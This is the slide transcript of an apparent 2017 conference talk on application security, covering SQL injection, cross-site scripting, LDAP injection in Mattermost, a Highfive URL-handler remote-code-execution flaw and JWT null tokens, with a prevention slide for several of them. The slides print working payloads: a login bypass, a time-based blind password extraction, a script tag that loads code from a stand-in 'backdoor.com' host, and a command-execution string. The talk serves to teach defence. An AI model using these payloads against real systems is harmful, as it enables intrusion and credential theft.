Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

AOEconf17: Application Security - Bastian Ike

71 views

Published on

Bastian Ike, developer at AOE, talks about Application Security: How security issues develop, and how they are found, exploited and can be mitigated. Security issues usually develop due to assumptions on certain behavior, bugs and just missing knowledge about what is actually possible, and how these bugs can be exploited eventually. Bastian shows how these issues develop, and how attackers utilize and combine bugs to eventually exploit systems and elevate privileges. Bastian also shows how we can mitigate security issues and how to spot them in our code.

https://www.aoe.com

Published in: Software
  • Be the first to comment

  • Be the first to like this

AOEconf17: Application Security - Bastian Ike

  1. 1. Application Security AOE Conf 2017
  2. 2. What is
 Application Security?
  3. 3. Application Security • Security in software • Not management security, perimeter security, etc • Possible Attack vectors • How to prevent issues
  4. 4. Attack vectors
  5. 5. Code Execution Make a system execute arbitrary code
  6. 6. Buffer Overflows • Assembler code injected into memory • 1996, Aleph One, "Smashing the stack for fun and profit" • Possible by overflowing a programs memory with controlled data
  7. 7. SQL Injection • Execute arbitrary SQL code • Possible by interpolating user-submitted data without proper escaping • Can be used to read/write files on DB server
  8. 8. Cross Site Scripting • Execute arbitrary JavaScript in a privileged context • Executed on a client's machine • Privileged context: Browser (domain/cookies) • Steal/Modify cookies • AJAX Requests to privileged areas
  9. 9. Cryptography Attack cryptographic measures for confidentiality and integrity
  10. 10. Signatures • Fake signatures/tokens for unauthorised access
  11. 11. Encryption • Break encryption • Missing encryption • Broken Encryption: • Example: Bleichenbacher RSA
  12. 12. Business Logic Make legit code behave in an unintended way
  13. 13. Race Conditions • Re-order execution flows to change an operations result
  14. 14. Exploit basics
  15. 15. SQL Injection • Query: SELECT * FROM users WHERE 
 username="${USERNAME}" AND 
 password="${PASSWORD}"; • Username: Bastian • Passwort: Sesame098 • Query: SELECT * FROM users WHERE 
 username="Bastian" AND 
 password="Sesame098";
  16. 16. SQL Injection • Query: SELECT * FROM users WHERE 
 username="${USERNAME}" AND 
 password="${PASSWORD}"; • Username: Bastian • Passwort: " OR 1=1 -- x • Query: SELECT * FROM users WHERE 
 username="Bastian" AND 
 password="" OR 1=1 -- x";
  17. 17. SQL Injection • Query: SELECT * FROM logs WHERE 
 token="${TOKEN}"; • Token: a" AND IF(SUBSTRING(
 (SELECT password FROM users WHERE name="admin" LIMIT 1)
 ,0,1) = 'a', SLEEP(5), 0) -- x • Query: SELECT * FROM logs WHERE
 token="a" AND IF(SUBSTRING(
 (SELECT password FROM users WHERE name="admin" LIMIT 1)
 ,0,1) = 'a', SLEEP(5), 0) -- x";
  18. 18. Cross-Site Scripting • Template: <a href="${page}">You are here</a> • URL: http://example.com/page=hello • Template: <a href="hello">You are here</a>
  19. 19. Cross-Site Scripting • Template: <a href="${page}">You are here</a> • URL: http://example.com/page="><script src="http://backdoor.com/x.js"></script> • Template: <a href=""><script src="http:// backdoor.com/x.js"></script>">You are here</a>
  20. 20. Cross-Site Scripting • Code runs in Browser of the one opening the link • Access to Cookies+LocalStorage • Can send requests and read their result (emulate administrator behaviour) • Change page look/behaviour (steal passwords, etc)
  21. 21. Exploits samples
  22. 22. Mattermost LDAP Injection • https://mattermost/api/v3/users/login • login_id: username)(givenName=test* • password: "" • Response: • 401: OK, query successful • 50x: Error, query failed
  23. 23. Mattermost LDAP Injection
  24. 24. Mattermost LDAP Injection
  25. 25. Mattermost LDAP Injection
  26. 26. Mattermost LDAP Injection • Prevention: properly escape characters which might be interpreted by LDAP
  27. 27. Highfive RCE • Target: URL-Handler highfive:// • Possible arguments: ?domain=, ?protocol=
  28. 28. Highfive RCE Privileged Non-Privileged Display Web-pages Execute processes etc Highfive Sandbox (NW.js) Whitelist: https://highfive.com https://dev.highfive.com
  29. 29. Highfive RCE • highfive://test.com.a/? domain=alert(require('child_process').execSyn c('hostname;echo;id').toString())// &protocol=javascript • Starts Highfive on a privileged initial domain • Redirects to: protocol + '://' + domain + path • Becomes: 
 javascript:// alert(require('child_process').execSync('host name;echo;id').toString())//something
  30. 30. Highfive RCE • Redirect to javascript:// does not change the sandbox • Works on any operating system • Thank you JavaScript 😙
  31. 31. Highfive RCE • Prevention: whitelist redirect targets
  32. 32. JWT Null Tokens
  33. 33. JWT Null Tokens
  34. 34. JWT Null Tokens
  35. 35. JWT Null Tokens
  36. 36. JWT Null Tokens • Prevention: Do not allow null signature algorithms
  37. 37. Preventive actions
  38. 38. Finding Security issues • Code Reviews • Curiosity • (sometimes: automated scanners)
  39. 39. Stay up to date
  40. 40. React fast
  41. 41. React fast • Escalation plan for security incidents • Fast deployment strategies • Firewall setup to cut off possible infected systems • Snapshot infrastructure for later analysis
  42. 42. Thank you :) Questions?

×